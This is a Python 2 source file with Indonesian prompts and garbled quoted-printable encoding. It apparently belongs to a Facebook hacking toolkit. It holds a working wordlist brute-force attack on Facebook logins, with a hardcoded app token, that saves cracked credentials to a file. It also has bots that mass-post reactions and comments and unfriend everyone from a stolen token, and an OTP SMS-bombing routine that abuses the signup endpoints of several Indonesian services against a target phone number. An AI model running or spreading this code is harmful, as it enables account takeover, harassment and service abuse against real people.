    raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
    super()


def brute():
    os.system('reset')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        os.system('reset')
        print logo
        print 40 * '\x1b[1;97m\xe2\x95\x90'
        try:
            email =3D raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b=
[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m '=
)
            passw =3D raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;9=
7mext(list.txt) \x1b[1;91m: \x1b[1;97m')
            total =3D open(passw, 'r')
            total =3D total.readlines()
            print 40 * '\x1b[1;97m\xe2\x95\x90'
            print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92m=
Target \x1b[1;91m:\x1b[1;97m ' + email
            print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(to=
tal)) + ' \x1b[1;92mPassword'
            jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b=
[1;97m...')
            sandi =3D open(passw, 'r')
            for pw in sandi:
                try:
                    pw =3D pw.replace('\n', '')
                    sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\=
x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
                    sys.stdout.flush()
                    data =3D requests.get('https://b-api.facebook.com/meth=
od/auth.login?access_token=3D237759909591655%25257C0f140aabedfb65ac27a739ed=
1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + email + '&locale=3Den_US=
&password=3D' + pw + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f555f9=
9fb61fcd7aa0c44f58f522ef6')
                    mpsh =3D json.loads(data.text)
                    if 'access_token' in mpsh:
                        dapat =3D open('Brute.txt', 'w')
                        dapat.write(email + ' | ' + pw + '\n')
                        dapat.close()
                        print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
                        print 40 * '\x1b[1;97m\xe2\x95\x90'
                        print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername=
 \x1b[1;91m:\x1b[1;97m ' + email
                        print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword=
 \x1b[1;91m:\x1b[1;97m ' + pw
                        keluar()
                    else:
                        if 'www.facebook.com' in mpsh['error_msg']:
                            ceks =3D open('Brutecekpoint.txt', 'w')
                            ceks.write(email + ' | ' + pw + '\n')
                            ceks.close()
                            print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
                            print 40 * '\x1b[1;97m\xe2\x95\x90'
                            print '\x1b[1;91m[!] \x1b[1;93mAkun kena Check=
point'
                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUser=
name \x1b[1;91m:\x1b[1;97m ' + email
                            print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPass=
word \x1b[1;91m:\x1b[1;97m ' + pw
                            keluar()
                except requests.exceptions.ConnectionError:
                    print '\x1b[1;91m[!] Koneksi Error'
                    time.sleep(1)

        except IOError:
            print '\x1b[1;91m[!] File tidak ditemukan...'
            print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memilik=
i wordlist'
            tanyaw()


def tanyaw():
    why =3D raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x=
1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
    if why =3D=3D '':
        print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
        tanyaw()
    else:
        if why =3D=3D 'y':
            wordlist()
        else:
            if why =3D=3D 'Y':
                wordlist()
            else:
                if why =3D=3D 't':
                    menu_hack()
                else:
                    if why =3D=3D 'T':
                        menu_hack()
                    else:
                        print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
                        tanyaw()


def menu_bot():
    os.system('clear')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    os.system('clear')
    banner()
    print
    print '\x1b[1;36;40m[\x1b[1;37;40m1\x1b[1;36;40m]\x1b[1;37;40m Bot rea=
ctions target post'
    print '\x1b[1;36;40m[\x1b[1;37;40m2\x1b[1;36;40m]\x1b[1;37;40m Bot rea=
ctions group post'
    print '\x1b[1;36;40m[\x1b[1;37;40m3\x1b[1;36;40m]\x1b[1;37;40m Bot kom=
en target post'
    print '\x1b[1;36;40m[\x1b[1;37;40m4\x1b[1;36;40m]\x1b[1;37;40m Bot kom=
en group post'
    print '\x1b[1;36;40m[\x1b[1;37;40m5\x1b[1;36;40m]\x1b[1;37;40m Hapus p=
ostingan facebook'
    print '\x1b[1;36;40m[\x1b[1;37;40m6\x1b[1;36;40m]\x1b[1;37;40m Hapus p=
ertemanan facebook'
    print '\x1b[1;36;40m[\x1b[1;37;40m7\x1b[1;36;40m]\x1b[1;37;40m Terima =
pertemanan facebook'
    print '\x1b[1;37;40m[\x1b[1;36;40m0\x1b[1;37;40m]\x1b[1;36;40m Kembali=
 ke MENU UTAMA'
    print
    bot_pilih()


def bot_pilih():
    bots =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;96mpilih =
:\x1b[1;93m ')
    if bots =3D=3D '':
        print
        print ("\033[1;97mpilih yang benar.......!!!")
	print
        bot_pilih()
    else:
        if bots =3D=3D '1':
            menu_react()
        else:
            if bots =3D=3D '2':
                grup_react()
            else:
                if bots =3D=3D '3':
                    bot_komen()
                else:
                    if bots =3D=3D '4':
                        grup_komen()
                    else:
                        if bots =3D=3D '5':
           			 menu_react()
        		else:
            			if bots =3D=3D '6':
                			unfriend()
            			else:
                			if bots =3D=3D '7':
                    				bot_komen()
                			else:
                    				if bots =3D=3D '0':
                        				menu()
                    				else:
                             				print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97=
m' + hack + ' \x1b[1;91mTidak ada'
                             				hack_pilih()
                        

def menu_react():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    print 
    print '\x1b[1;36;40m[\x1b[1;37;40m1\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mLike'
    print '\x1b[1;36;40m[\x1b[1;37;40m2\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mLove'
    print '\x1b[1;36;40m[\x1b[1;37;40m3\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mWow'
    print '\x1b[1;36;40m[\x1b[1;37;40m4\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mHaha'
    print '\x1b[1;36;40m[\x1b[1;37;40m5\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mSedih'
    print '\x1b[1;36;40m[\x1b[1;37;40m6\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mMarah'
    print '\x1b[1;37;40m[\x1b[1;36;40m0\x1b[1;37;40m]\x1b[1;36;40m Kembali=
'
    print
    react_pilih()


def react_pilih():
    global tipe
    aksi =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;96mpilih =
:\x1b[1;93m ')
    print
    if aksi =3D=3D '':
        print
        print ("\033[1;97mpilih yang benar.......!!!")
	print
        react_pilih()
    else:
        if aksi =3D=3D '1':
            tipe =3D 'LIKE'
            react()
        else:
            if aksi =3D=3D '2':
                tipe =3D 'LOVE'
                react()
            else:
                if aksi =3D=3D '3':
                    tipe =3D 'WOW'
                    react()
                else:
                    if aksi =3D=3D '4':
                        tipe =3D 'HAHA'
                        react()
                    else:
                        if aksi =3D=3D '5':
                            tipe =3D 'SAD'
                            react()
                        else:
                            if aksi =3D=3D '6':
                                tipe =3D 'ANGRY'
                                react()
                            else:
                                if aksi =3D=3D '0':
                                    menu_bot()
                                else:
                                    print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1=
;97m' + aksi + ' \x1b[1;91mTidak ada'
                                    react_pilih()


def react():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        jalan("\033[1;96m=C2=A4"*48)
        ide =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMas=
ukan ID Target :\x1b[1;93m ')
        limit =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mL=
imit             :\x1b[1;93m ')
        try:
            oh =3D requests.get('https://graph.facebook.com/' + ide + '?fi=
elds=3Dfeed.limit(' + limit + ')&access_token=3D' + toket)
            ah =3D json.loads(oh.text)
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;92mTunggu sebe=
ntar.....')
            jalan("\033[1;96m=C2=A4"*48)
            for a in ah['feed']['data']:
                y =3D a['id']
                reaksi.append(y)
                requests.post('https://graph.facebook.com/' + y + '/reacti=
ons?type=3D' + tipe + '&access_token=3D' + toket)
                print '\x1b[1;96m[\x1b[1;97m' + y[:10].replace('\n', ' ') =
+ '... \x1b[1;96m] \x1b[1;97m' + tipe

            print
            print '\r\x1b[1;97mSelesai \x1b[1;96m' + str(len(reaksi))
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()
        except KeyError:
            print '\x1b[1;91m[!] ID Tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()


def grup_react():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    print
    print '\x1b[1;36;40m[\x1b[1;37;40m1\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mLike'
    print '\x1b[1;36;40m[\x1b[1;37;40m2\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mLove'
    print '\x1b[1;36;40m[\x1b[1;37;40m3\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mWow'
    print '\x1b[1;36;40m[\x1b[1;37;40m4\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mHaha'
    print '\x1b[1;36;40m[\x1b[1;37;40m5\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mSedih'
    print '\x1b[1;36;40m[\x1b[1;37;40m6\x1b[1;36;40m]\x1b[1;37;40m \x1b[1;=
97mMarah'
    print '\x1b[1;37;40m[\x1b[1;36;40m0\x1b[1;37;40m]\x1b[1;36;40m Kembali=
'
    print
    reactg_pilih()


def reactg_pilih():
    global tipe
    aksi =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;96mpilih =
:\x1b[1;93m ')
    print
    if aksi =3D=3D '':
        print ("\033[1;97mpilih yang benar.......!!!")
	print
        reactg_pilih()
    else:
        if aksi =3D=3D '1':
            tipe =3D 'LIKE'
            reactg()
        else:
            if aksi =3D=3D '2':
                tipe =3D 'LOVE'
                reactg()
            else:
                if aksi =3D=3D '3':
                    tipe =3D 'WOW'
                    reactg()
                else:
                    if aksi =3D=3D '4':
                        tipe =3D 'HAHA'
                        reactg()
                    else:
                        if aksi =3D=3D '5':
                            tipe =3D 'SAD'
                            reactg()
                        else:
                            if aksi =3D=3D '6':
                                tipe =3D 'ANGRY'
                                reactg()
                            else:
                                if aksi =3D=3D '0':
                                    menu_bot()
                                else:
                                    print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1=
;97m' + aksi + ' \x1b[1;91mTidak ada'
                                    reactg_pilih()


def reactg():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        jalan("\033[1;96m=C2=A4"*48)
        ide =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMas=
ukan ID group :\x1b[1;93m ')
        limit =3D raw_input('\x1b[1;96m[\x1b[1;96m!\x1b[1;96m] \x1b[1;97mL=
imit            :\x1b[1;93m ')
        ah =3D requests.get('https://graph.facebook.com/group/?id=3D' + id=
e + '&access_token=3D' + toket)
        asw =3D json.loads(ah.text)
        print '\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama grup      =
  :\x1b[1;93m ' + asw['name']
        try:
            oh =3D requests.get('https://graph.facebook.com/v3.0/' + ide +=
 '?fields=3Dfeed.limit(' + limit + ')&access_token=3D' + toket)
            ah =3D json.loads(oh.text)
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;92mTunggu sebe=
ntar.....')
            jalan("\033[1;96m=C2=A4"*48)
            for a in ah['feed']['data']:
                y =3D a['id']
                reaksigrup.append(y)
                requests.post('https://graph.facebook.com/' + y + '/reacti=
ons?type=3D' + tipe + '&access_token=3D' + toket)
                print '\x1b[1;96m[\x1b[1;97m' + y[:10].replace('\n', ' ') =
+ '... \x1b[1;96m] \x1b[1;97m' + tipe

            print
            print '\r\x1b[1;97mSelesai \x1b[1;96m' + str(len(reaksigrup))
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()
        except KeyError:
            print '\x1b[1;91m[!] ID Tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()


def bot_komen():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        print
        jalan("\033[1;96m=C2=A4"*48)
        ide =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMas=
ukan ID target :\x1b[1;93m ')
        km =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMasu=
kan komentar  :\x1b[1;93m ')
        limit =3D raw_input('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mL=
imit             :\x1b[1;93m ')
        try:
            p =3D requests.get('https://graph.facebook.com/' + ide + '?fie=
lds=3Dfeed.limit(' + limit + ')&access_token=3D' + toket)
            a =3D json.loads(p.text)
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;92mTunggu sebe=
ntar.....')
            jalan("\033[1;96m=C2=A4"*48)
            for s in a['feed']['data']:
                f =3D s['id']
                komen.append(f)
                requests.post('https://graph.facebook.com/' + f + '/commen=
ts?message=3D' + km + '&access_token=3D' + toket)
                print '\x1b[1;96m[\x1b[1;97m' + km[:10].replace('\n', ' ')=
 + '... \x1b[1;96m]'

            print
            print '\r\x1b[1;97mSelesai \x1b[1;96m' + str(len(komen))
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()
        except KeyError:
            print '\x1b[1;91m[!] ID Tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()


def grup_komen():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
    	print
        jalan("\033[1;96m=C2=A4"*48)
        ide =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMsu=
kan ID group   :\x1b[1;93m ')
        km =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMasu=
kan komentar  :\x1b[1;93m ')
        limit =3D raw_input('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mL=
imit             :\x1b[1;93m ')
        try:
            ah =3D requests.get('https://graph.facebook.com/group/?id=3D' =
+ ide + '&access_token=3D' + toket)
            asw =3D json.loads(ah.text)
            print '\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama grup  =
       :\x1b[1;93m ' + asw['name']
            p =3D requests.get('https://graph.facebook.com/v3.0/' + ide + =
'?fields=3Dfeed.limit(' + limit + ')&access_token=3D' + toket)
            a =3D json.loads(p.text)
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;92mTunggu sebe=
ntar.....')
            jalan("\033[1;96m=C2=A4"*48)
            for s in a['feed']['data']:
                f =3D s['id']
                komengrup.append(f)
                requests.post('https://graph.facebook.com/' + f + '/commen=
ts?message=3D' + km + '&access_token=3D' + toket)
                print '\x1b[1;96m[\x1b[1;97m' + km[:10].replace('\n', ' ')=
 + '... \x1b[1;96m]'

            print
            print '\r\x1b[1;97mSelesai \x1b[1;96m' + str(len(komengrup))
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()
        except KeyError:
            print '\x1b[1;91m[!] ID Tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_bot()


def unfriend():
	try:
		toket=3Dopen('login.txt','r').read()
	except IOError:
		print"\033[1;91m[!] Token not found"
		os.system('rm -rf login.txt')
		time.sleep(0.01)
		login()
	print
	jalan('\033[1;91m[=E2=9C=BA] \033[1;92mStart \033[1;97m...')
	print "\033[1;97mStop \033[1;91mCTRL+C"
	print 42*"\033[1;97m=E2=95=90"
	try:
		pek =3D requests.get('https://graph.facebook.com/me/friends?access_token=
=3D'+toket)
		cok =3D json.loads(pek.text)
		for i in cok['data']:
			nama =3D i['name']
			id =3D i['id']
			requests.delete("https://graph.facebook.com/me/friends?uid=3D"+id+"&acc=
ess_token=3D"+toket)
			print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
	except IndexError: pass
	except KeyboardInterrupt:
		print "\033[1;91m[!] Stopped"
		raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
		menu_bot()
	print"\n\033[1;91m[+] \033[1;92mDone"
	raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
	menu_bot()


def menu_spam():
    os.system('clear')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    banner()
    print
    print
    print '\x1b[1;36;40m[\x1b[1;37;40m1\x1b[1;36;40m] \x1b[1;37;40mSpam sm=
s unlimited'
    print '\x1b[1;36;40m[\x1b[1;37;40m2\x1b[1;36;40m] \x1b[1;37;40mSpam wh=
atsapp unlimited'
    print '\x1b[1;36;40m[\x1b[1;37;40m3\x1b[1;36;40m] \x1b[1;37;40mSpam sm=
s/call unlimited'
    print '\x1b[1;37;40m[\x1b[1;36;40m0\x1b[1;37;40m]\x1b[1;36;40m Kembali=
 ke MENU UTAMA'
    print
    spam_pilih()


def spam_pilih():
    spam =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;96mpilih =
:\x1b[1;93m ')
    if spam =3D=3D '':
        print
        print ("\033[1;97mpilih yang benar.......!!!")
	print
        spam_pilih()
    else:
        if spam =3D=3D '1':
            Spam()
        else:
            if spam =3D=3D '2':
                nontelkom()
            else:
                if spam =3D=3D '3':
                    bingung()
                else:
                    if spam =3D=3D '0':
                       menu()
                    else:
                        print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + spam=
 + ' \x1b[1;91mTidak ada'
                        spam_pilih()

try:
	
	import mechanize, requests, random, sys, os, re
	from time import sleep
	from cookielib import LWPCookieJar as Cookie
	from requests.exceptions import ConnectionError

	os.system('clear')

	def Tik(s):
		for i in s + '\n':
			sys.stdout.write(i)
			sys.stdout.flush()
			sleep(random.random() * 0.0010)


	def MapClub(Phone, Amount):
		for _ in range(Amount):

			sleep(0.01)
			headers =3D {
			'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWe=
bKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',
			'Referer' : 'https://mapclub.com/id/user/signup'
			}

			postData =3D requests.post('https://cmsapi.mapclub.com/api/signup-otp',=
 data =3D {'phone' : Phone}, allow_redirects =3D True)

			if 'error' in postData.text:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
					
	def Hooq(Phone, Amount):
		for _ in range(Amount):

			sleep(0.01)
			bro =3D mechanize.Browser()
			Cookies =3D Cookie('.cookieslog')

			bro.set_handle_robots(False)
			bro.set_cookiejar(Cookies)

			bro.addheaders =3D [
			('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWe=
bKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9'),
			('Referer', 'https://authenticate.hooq.tv/signupmobile?return?Url=3Dhtt=
ps://www.hooq.tv/auth//verify/ev%2F%257Cid')
			]

			bro.open('https://authenticate.hooq.tv/signupmobile?returnUrl=3Dhttps:/=
/www.hooq.tv%2Fauth%2Fverify%2Fev%2F%257Cid&serialNo=3D0&deviceType=3DwebCl=
ient&modelNo=3Dwebclient-aurora&deviceName=3Dwebclient-aurora/production-8.=
4.1&deviceSignature=3D0')
			bro.select_form(nr=3D0)		
			bro.form ['mobile'] =3D str(Phone)
			submit =3D bro.submit()

			if 'Your+number+has+been+blocked.' in submit.geturl():
				print(W+'NOMOR TARGET UDAH DI BLOKIR\n'+C+'SAMA PIHAK HOOQ. '+W+'COBA =
NOMOR LAIN ^_^')
				sys.exit() 
			
			elif 'buCode' in submit.geturl():
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')

	def HarVest(Phone, Amount):
		for _ in range(Amount):
		
			sleep(0.01)
			headers =3D {
			'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWe=
bKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',
			'Referer' : 'https://harvestcakes.com/register'
			}

			data =3D {
			'phone' : Phone,
			'url' : ''
			}

			Sess =3D requests.Session()
			Sess.cookies =3D Cookie('.cookieslog')
			Sess.headers =3D headers

			postData =3D Sess.post('https://harvestcakes.com/register', data =3D da=
ta, allow_redirects =3D True)

			if 'Enter OTP code we sent via SMS on phone number' in postData.text:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
				Sess.cookies.save()
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')

	def Olx(Phone, Amount):
		for _ in range(Amount):
		
			sleep(0.01)
			headers =3D {
			'user-agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWe=
bKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',
			'referer' : 'https://www.olx.co.id/'
			}
	
			data =3D {
			'grantType' : 'phone',
			'phone' : Phone,
			'language' : ''
			}
		
			Sess =3D requests.Session()
			Sess.cookies =3D Cookie('.cookieslog')
			Sess.headers =3D headers
		
			postData =3D Sess.post('https://www.olx.co.id/api/auth/authenticate', j=
son =3D data, allow_redirects =3D True)
		
			if 'PIN' and 'token' in postData.text:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
				Sess.cookies.save()
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')
			
	def Tokped(Phone, Amount):
		for _ in range(Amount):
		
			sleep(0.01)
			headers =3D {
			'Connection' : 'keep-alive',
			'Accept' : 'application/json, text/javascript, */*; q=3D0.01',
			'Origin' : 'https://accounts.tokopedia.com','X-Requested-With' : 'XMLHt=
tpRequest',
			'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.=
0) like Gecko',
			'Content-Type' : 'application/x-www-form-urlencoded; charset=3DUTF-8',
			'Accept-Encoding' : 'gzip, deflate'
			}

			TokenSite =3D requests.get('https://accounts.tokopedia.com/otp/c/page?o=
tp_type=3D116&msisdn=3D'+Phone+'&ld=3Dhttps%3A%2F%2Faccounts.tokopedia.com%=
2Fregister%3Ftype%3Dphone%26phone%3D'+Phone+'%26status%3DeyJrIjp0cnVlLCJtIj=
p0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ%253D%253D', headers =
=3D headers).text
			SearchToken =3D re.search(r'\<input\ id\=3D\"Token\"\ value\=3D\"(.*?)\=
"\ type\=3D\"hidden\"\>', TokenSite).group(1)
		
			data =3D {
			'tk' : SearchToken,
			'msisdn' : Phone,
			'otp_type' : '116',
			'number_otp_digit' : '6',
			'email' : '',
			'original_param' : '',
			'user_id' : '',
			'signature' : '',
			}
		
			postData =3D requests.post('https://accounts.tokopedia.com/otp/c/ajax/r=
equest-sms', data =3D data, headers =3D headers)
		
			if '"success": true' in postData.text:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')
			
	def AlfaMart(Phone, Amount):
		for _ in range(Amount):
		
			sleep(0.01)
			headers =3D {
			'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.=
0) like Gecko',
			'Referer' : 'https://www.alfacart.com/login?tab=3Ddaftar&return=3D'
			}
		
			data =3D {
			'fullName' : 'Yt Jejak Cyber',
			'red' : 'customer%2Faccount',
			'email' : 'jejak@gmail.com',
			'password' : 'Subscribe Channel Gua Yak',
			'isNewsletter' : 'on'
			}
		
			Sess =3D requests.Session()
			Sess.cookies =3D Cookie('.cookieslog')
			Sess.headers =3D headers

			postData =3D Sess.post('https://www.alfacart.com/getMemberInfo', data =
=3D {'email' : 'jejak@gmail.com'})
			postData_2 =3D Sess.post('https://www.alfacart.com/otp/checkActiveNumbe=
r', data =3D {'phoneNumber' : Phone, 'email' : 'jejak@gmail.com'})
			postData_3 =3D Sess.post('https://www.alfacart.com/otp/phoneNumberRegis=
tration', data =3D {'phoneNumber' : Phone})
			postData_4 =3D Sess.post('https://www.alfacart.com/doRegister', data =
=3D data)
		
			if 'responseMessage":"Nomor terverifikasi dan dapat diubah.","status":t=
rue' in postData_2.text:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL=
'+H+' \xE2\x9C\x94')
				Sess.cookies.save()
			
			else:
				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M=
+' \xE2\x9C\x96')
	
	def Phd(Phone, Amount):
	
		if str(Phone).startswith('08', 0) =3D=3D True:
			Phone =3D Phone.replace('08', '8')

		for _ in range(Amount):

			sleep(5)
			headers =3D {
			'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWe=
bKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',
			'Referer' : 'https://www.phd.co.id/en/users/createnewuser'
			}

			data =3D {
			'requests_id' : '',
			'first_name' : 'Subscribe YT',
			'last_name' : 'Jejak Cyber',
			'gender' : 'male',
			'phone_number' : Phone,
			'birthday' : '0000-00-00',
			'username' : 'YouTube@gmail.com',
			'password' : 'Subscribe 1000x Ya Anying',
			'agreeterms' : '1'
			}

			Sess =3D requests.Session()
			Sess.cookies =3D Cookie('.cookieslog')
			Sess.headers =3D headers

			postData =3D Sess.post('http://www.phd.co.id/en/users/createNewUser', d=
ata =3D data , allow_redirects =3D True)
			Sess.cookies.save()
		
			print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL'=
+H+' \xE2\x9C\x94')
		
	def Spam():
		print
		Tik(W+50*'=3D')
		Tik(C+'\tTOOLS\t\t LIMIT\t\tSTATUS')
		Tik(W+50*'=3D')
		print
		Tik(C+'['+W+'1'+C+']'+W+' SPAM OTP MAPCLUB'+W+'\tUNLIMITED'+W+'\tACTIVE'=
+H+' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'2'+C+']'+W+' SPAM OTP HOOQ'+W+'\tBELUM TAU'+W+'\tACTIVE'+H+=
' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'3'+C+']'+W+' SPAM OTP HARVEST'+W+'\t6X / 1 HARI'+W+'\tACTIV=
E'+H+' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'4'+C+']'+W+' SPAM OTP OLX'+W+'\tUNLIMITED'+W+'\tACTIVE'+H+'=
 \xE2\x9C\x94')
		Tik(C+50*'=3D')
